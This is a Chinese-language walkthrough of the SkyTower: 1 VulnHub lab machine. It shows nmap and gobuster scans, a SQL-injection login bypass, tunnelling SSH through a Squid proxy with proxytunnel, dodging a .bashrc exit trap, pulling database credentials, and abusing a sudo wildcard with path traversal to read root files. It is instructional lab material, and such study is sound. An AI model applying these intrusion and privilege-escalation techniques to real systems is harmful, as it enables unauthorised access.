VulnHub靶机渗透:SKYTOWER: 1

SKYTOWER: 1

  • 靶机环境介绍
  • nmap扫描
    • 端口扫描
    • 服务扫描
    • 漏洞扫描
    • 总结
  • 80端口
    • 目录爆破
  • 3128端口
  • 获取立足点
  • 获取立足点2
  • 提权
  • 总结

靶机环境介绍

https://www.vulnhub.com/entry/skytower-1,96/
靶机IP:192.168.56.101
kali IP:192.168.56.102

nmap扫描

端口扫描

sudo nmap --min-rate=5000 -p- 192.168.56.101
[sudo] kali 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 06:36 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00046s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   filtered ssh
80/tcp   open     http
3128/tcp open     squid-http
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.15 seconds

服务扫描

sudo nmap -sVC -O -p22,80,3128 -oN nmap/details 192.168.56.101
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 06:37 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00057s latency).

PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Debian)
3128/tcp open     http-proxy Squid http proxy 3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.1.20
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.59 seconds

漏洞扫描

sudo nmap --script=vuln -p22,80,3128 -oN nmap/vulns 192.168.56.101
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 06:39 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00049s latency).

PORT     STATE    SERVICE
22/tcp   filtered ssh
80/tcp   open     http
| http-enum:
|_  /login.php: Possible admin folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection:
|   Possible sqli for forms:
|     Form at path: /, form's action: login.php. Fields that might be vulnerable:
|_      email
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.101
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.56.101:80/
|     Form id:
|_    Form action: login.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3128/tcp open     squid-http
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 33.80 seconds

总结

发现22端口过滤,开放了80和3128端口,那就是优先级80,3128,22。

80端口

日常,先目录爆破

目录爆破

$ sudo gobuster dir --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,rar,txt,html,jsp,zip -u http://192.168.56.101 | tee gobuster.log
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.101
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,txt,rar,html,jsp,zip
[+] Timeout:                 10s
===============================================================
2023/06/24 06:40:38 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 1136]
/.php                 (Status: 403) [Size: 286]
/index.html           (Status: 200) [Size: 1136]
/.html                (Status: 403) [Size: 287]
/login.php            (Status: 200) [Size: 21]
/background           (Status: 200) [Size: 2572609]
/.php                 (Status: 403) [Size: 286]
/.html                (Status: 403) [Size: 287]
/background2          (Status: 200) [Size: 2831446]
/server-status        (Status: 403) [Size: 295]

在目录爆破的过程中查看网页内容。

发现登录框,尝试万能密码。(这里用户和密码一样)
VulnHub靶机渗透:SKYTOWER: 1_第1张图片
报错了,错误信息为
在这里插入图片描述
从这个信息可以看出,应该是过滤了=,or,这里修改一下。尝试绕过,先用 双写or绕过or。
VulnHub靶机渗透:SKYTOWER: 1_第2张图片
登录成功了,
VulnHub靶机渗透:SKYTOWER: 1_第3张图片
这里获取到一个凭据john:hereisjohn,提示去ssh登录,但是过滤了22端口呀,登录不上呀。没有思路了。下一个端口

3128端口

通过google搜索,发现该端口运行的是http-proxy Squid http proxy 3.1.20,是个代理服务,那有没有可能通过这个代理服务,访问到ssh的22端口呢。
通过搜索,发现可以使用proxytunnelproxychain,我这里使用的是proxytunnel

─$ proxytunnel -p 192.168.56.101:3128 -d 192.168.56.101:22 -a 6666

这句话的意思是,使用proxytunnel,使用-p参数指定192.168.56.101:3128代理,使用-d指定目标为192.168.56.101:22端口,映射到本地kali的6666端口。
那我这里使用kali去连接。

$ ssh [email protected] -p 6666
[email protected]'s password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 20 07:41:08 2014

Funds have been withdrawn
Connection to 127.0.0.1 closed.

这里可以看到连接成功后,退出了。那可能是进行了关闭。但是ssh可以在连接的时候使用 -t 执行命令。
尝试一下。

获取立足点

$ ssh [email protected] -p 6666 -t '/bin/bash'
[email protected]'s password:

输入密码后,发现没有任何提示,也没有退出。这里尝试输入指令。

$ ssh [email protected] -p 6666 -t '/bin/bash'
[email protected]'s password:

whoami
john
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 08:00:27:54:4a:37 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.101/24 brd 192.168.56.255 scope global eth0
    inet6 fe80::a00:27ff:fe54:4a37/64 scope link
       valid_lft forever preferred_lft forever
id
uid=1000(john) gid=1000(john) groups=1000(john)

发现已经成功获取shell了。但是不太好用,也没有发现python程序。检查一下,为什么使用/bin//bash登录时,为什么会自动退出。

id
uid=1000(john) gid=1000(john) groups=1000(john)


ls -liah
total 24K
25132 drwx------ 2 john john 4.0K Jun 24 10:18 .
 7647 drwxr-xr-x 5 root root 4.0K Jun 20  2014 ..
   96 -rw------- 1 john john    7 Jun 20  2014 .bash_history
   79 -rw-r--r-- 1 john john  220 Jun 20  2014 .bash_logout
   80 -rw-r--r-- 1 john john 3.4K Jun 20  2014 .bashrc
   82 -rw-r--r-- 1 john john  675 Jun 20  2014 .profile



cat .bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac

# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth

# append to the history file, don't overwrite it
shopt -s histappend

# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000

# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize

# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar

# make less more friendly for non-text input files, see lesspipe(1)
#[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"

# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi

# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color) color_prompt=yes;;
esac

# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes

if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
        # We have color support; assume it's compliant with Ecma-48
        # (ISO/IEC-6429). (Lack of such support is extremely rare, and such
        # a case would tend to support setf rather than setaf.)
        color_prompt=yes
    else
        color_prompt=
    fi
fi

if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt

# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
    ;;
*)
    ;;
esac

# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    #alias dir='dir --color=auto'
    #alias vdir='vdir --color=auto'

    #alias grep='grep --color=auto'
    #alias fgrep='fgrep --color=auto'
    #alias egrep='egrep --color=auto'
fi

# some more ls aliases
#alias ll='ls -l'
#alias la='ls -A'
#alias l='ls -CF'

# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.

if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi

# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi

echo
echo  "Funds have been withdrawn"
exit
vim .bashrc
/bin/bash: line 20: vim: command not found

通过查看.bashrc发现,他输出一句话之后,退出了bash环境,那就先尝试使用sh环境,
ssh [email protected] -p 6666 -t '/bin/sh'

这里使用vi(因为没有vim),删除最后一行的exit。然后保存。
VulnHub靶机渗透:SKYTOWER: 1_第4张图片
然后输入/bin/bash,获得好用的bash环境。
VulnHub靶机渗透:SKYTOWER: 1_第5张图片

john@SkyTower:~$ whoami
john
john@SkyTower:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 08:00:27:54:4a:37 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.101/24 brd 192.168.56.255 scope global eth0
    inet6 fe80::a00:27ff:fe54:4a37/64 scope link
       valid_lft forever preferred_lft forever
john@SkyTower:~$ uname -a
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux
john@SkyTower:~$
john@SkyTower:~$

通过web页面知道,调用了sqll语句数据,那我们回到web目录查看有没有数据库信息。
VulnHub靶机渗透:SKYTOWER: 1_第6张图片
发现了root:root信息,使用mysql登录一下。发现登录成功!

john@SkyTower:/var/www$ mysql -uroot -proot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 55
Server version: 5.5.35-0+wheezy1 (Debian)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| SkyTech            |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.01 sec)

mysql> use SkyTech
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show  tables;
+-------------------+
| Tables_in_SkyTech |
+-------------------+
| login             |
+-------------------+
1 row in set (0.00 sec)

mysql> select * from login;
+----+---------------------+--------------+
| id | email               | password     |
+----+---------------------+--------------+
|  1 | [email protected]    | hereisjohn   |
|  2 | [email protected]    | ihatethisjob |
|  3 | [email protected] | senseable    |
+----+---------------------+--------------+
3 rows in set (0.00 sec)

发现了三个用户信息。分别是sara:ihatethisjob william:senseable
通过尝试,发现,sara可以登录,而william无法登录显示密码错误。

(在这之前我尝试使用su sara登录发现,进入bash环境后,秒退,这里可以想到还是.bashrc的问题。那这里继续使用ssh登录。

获取立足点2

┌──(kali㉿kali)-[~/oscp/12.KsyTower1]
└─$ rlwrap ssh [email protected] -p 6666 -t '/bin/sh'
[email protected]'s password: ************
[email protected]'s password:
$ /bin/bash

           rlwrap: warning: rlwrap appears to do nothing for ssh, which asks for
                                                                                single keypresses all the time. Don't you need --always-readline
              and possibly --no-children? (cf. the rlwrap manpage)

                                                                  warnings can be silenced by the --no-warnings (-n) option

sara@SkyTower:~$ whoami
sara
sara@SkyTower:~$ sudo -l
Matching Defaults entries for sara on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
sara@SkyTower:~$

提权

这里发现可以root无密码执行/bin/cat /accounts/\*,一开始我以为只能访问/accounts/目录下的文件,但是通过思考,可以发现,这里的* 指的是通配符,也就是可以目录穿越访问。试一试。

sara@SkyTower:~$ sudo /bin/cat /accounts/../../../root
/bin/cat: /accounts/../../../root: Is a directory
sara@SkyTower:~$ sudo /bin/ls /accounts/../../../root
flag.txt

这里发现了/root/flag.txt文件,查看一下。

sara@SkyTower:~$ sudo /bin/cat /accounts/../../../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
sara@SkyTower:~$ su
Password:
sara@SkyTower:~$ su
Password:
root@SkyTower:/home/sara# whoami
root
root@SkyTower:/home/sara# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 08:00:27:54:4a:37 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.101/24 brd 192.168.56.255 scope global eth0
    inet6 fe80::a00:27ff:fe54:4a37/64 scope link
       valid_lft forever preferred_lft forever
root@SkyTower:/home/sara# cd ~
root@SkyTower:~# ls
flag.txt
root@SkyTower:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 08:00:27:54:4a:37 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.101/24 brd 192.168.56.255 scope global eth0
    inet6 fe80::a00:27ff:fe54:4a37/64 scope link
       valid_lft forever preferred_lft forever

总结

1、SQL注入时需要通过提示信息修改注入代码,完成绕过。
2、当获得到ssh密码后,发现ssh端口无法登录时,可以查看代理服务。
3、使用proxytunnel代理软件,完成代理服务。
proxytunnel -p 192.168.56.101:3128 -d 192.168.56.101:22 -a 6666
使用proxytunnel,使用-p参数指定192.168.56.101:3128代理,使用-d指定目标为 192.168.56.101:22端口,映射到本地kali的6666端口。
4、ssh [email protected] -p 6666 -t '/bin/bash' ssh -t 可以使用-t 执行命令。
ssh username@remote_host -t command command_arguments
5、当发现/bash终端有问题时,可能是.bashrc文件出问题,可以尝试使用sh环境,查看.bashrc等其他文件。
6、当获取到反弹shell后,且web端存在sql数据操作,记得进入web目录查看配置文件,获取数据库信息。
7、获取到其他用户信息后可以尝试切换用户,使用sudo -l查看用户权限。
8、发现/bin/cat /accounts/* 这里可以使用目录穿越,这里的*表示通配符,可以使用/bin/cat /accounts/../../../path/to/file访问其他目录。

你可能感兴趣的:(渗透测试,打靶,vulnhub,网络,web安全,数据库)